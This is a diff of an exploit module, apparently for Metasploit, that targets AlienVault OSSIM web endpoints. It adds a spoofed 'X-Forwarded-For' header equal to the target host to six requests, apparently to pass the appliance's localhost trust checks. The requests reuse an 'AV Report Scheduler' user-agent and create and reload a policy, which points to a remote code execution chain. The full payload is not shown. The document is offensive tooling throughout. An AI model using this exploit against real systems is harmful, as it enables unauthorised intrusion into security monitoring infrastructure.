@@ -101,6 +101,7 @@ def exploit
101101 'method' => 'GET' ,
102102 'uri' => normalize_uri ( target_uri . path , 'ossim' , 'dashboard' , 'sections' , 'widgets' , 'data' , 'gauge.php' ) ,
103103 'headers' => {
104+ 'X-Forwarded-For' => rhost . to_s ,
104105 'User-Agent' => 'AV Report Scheduler' ,
105106 } ,
106107 'vars_get' => {
@@ -127,6 +128,7 @@ def exploit
127128 'method' => 'POST' ,
128129 'uri' => normalize_uri ( target_uri . path , 'ossim' , 'action' , 'modifyactions.php' ) ,
129130 'headers' => {
131+ 'X-Forwarded-For' => rhost . to_s ,
130132 'User-Agent' => 'AV Report Scheduler' ,
131133 } ,
132134 'vars_post' => {
@@ -164,6 +166,9 @@ def exploit
164166 'method' => 'GET' ,
165167 'uri' => normalize_uri ( target_uri . path , "ossim" , "action" , "getaction.php" ) ,
166168 'cookie' => cookie ,
169+ 'headers' => {
170+ 'X-Forwarded-For' => rhost . to_s ,
171+ } ,
167172 'vars_get' => {
168173 'page' => '1' ,
169174 'rp' => '2000'
@@ -184,6 +189,9 @@ def exploit
184189 'method' => 'GET' ,
185190 'uri' => normalize_uri ( target_uri . path . to_s , "ossim" , "policy" , "policy.php" ) ,
186191 'cookie' => cookie ,
192+ 'headers' => {
193+ 'X-Forwarded-For' => rhost . to_s ,
194+ } ,
187195 'vars_get' => {
188196 'm_opt' => 'configuration' ,
189197 'sm_opt' => 'threat_intelligence' ,
@@ -208,6 +216,9 @@ def exploit
208216 'method' => 'POST' ,
209217 'uri' => normalize_uri ( target_uri . path , "ossim" , "policy" , "newpolicy.php" ) ,
210218 'cookie' => cookie ,
219+ 'headers' => {
220+ 'X-Forwarded-For' => rhost . to_s ,
221+ } ,
211222 'vars_post' => {
212223 'descr' => policy ,
213224 'active' => '1' ,
@@ -267,6 +278,9 @@ def exploit
267278 'method' => 'GET' ,
268279 'uri' => normalize_uri ( target_uri . path , "ossim" , "conf" , "reload.php" ) ,
269280 'cookie' => cookie ,
281+ 'headers' => {
282+ 'X-Forwarded-For' => rhost . to_s ,
283+ } ,
270284 'vars_get' => {
271285 'what' => 'policies' ,
272286 'back' => '../policy/policy.php'
0 commit comments